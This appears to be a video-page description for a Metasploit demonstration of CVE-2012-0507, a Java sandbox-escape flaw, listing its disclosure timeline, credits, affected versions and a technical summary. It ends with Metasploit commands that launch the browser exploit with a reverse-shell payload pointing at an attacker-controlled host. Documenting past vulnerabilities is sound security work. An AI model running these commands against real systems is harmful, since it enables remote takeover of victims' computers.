filmov
tv
CVE-2012-0507 Java AtomicReferenceArray Type Violation Vulnerability Metasploit Demo
Показать описание
Timeline :
Vulnerability found by Jeroen Frijters
Vulnerability reported to the vendor by Jeroen Frijters the 2011-08-01
Coordinated public release of the vulnerability the 2012-02-14
Details of the vulnerability published by Jeroen Frijters the 2012-02-23
Metasploit PoC provided the 2012-03-29
PoC provided by:
Jeroen Frijters
sinn3r
juan vazquez
egypt
Reference(s) :
CVE-2012-0507
OSVDB-80724
Oracle Java SE CPU - Feb 2012
Affected versions :
Oracle Java SE 7 Update 2 and before
Oracle Java SE 6 Update 30 and before
Oracle Java SE 5.0 Update 33 and before
Tested on Windows XP Pro SP3 with Oracle Java SE 6 Update 16
Description :
This module exploits a vulnerability due to the fact that AtomicReferenceArray uses the Unsafe class to store a reference in an array directly, which may violate type safety if not used properly. This allows a way to escape the JRE sandbox, and load additional classes in order to perform malicious operations.
Metasploit demo :
use exploit/multi/browser/java_atomicreferencearray
SET SRVHOST 192.168.178.100
SET PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.178.100
exploit
0:01:23
0:04:19
0:00:08
0:01:32
0:01:07
0:01:26
0:01:05
0:01:42
0:03:02
0:03:42
0:01:18
0:01:54
0:02:45
0:01:31
0:01:58
0:02:11
0:04:35
0:06:29
0:01:26
0:05:32
0:03:46
0:01:56
0:08:11
0:03:59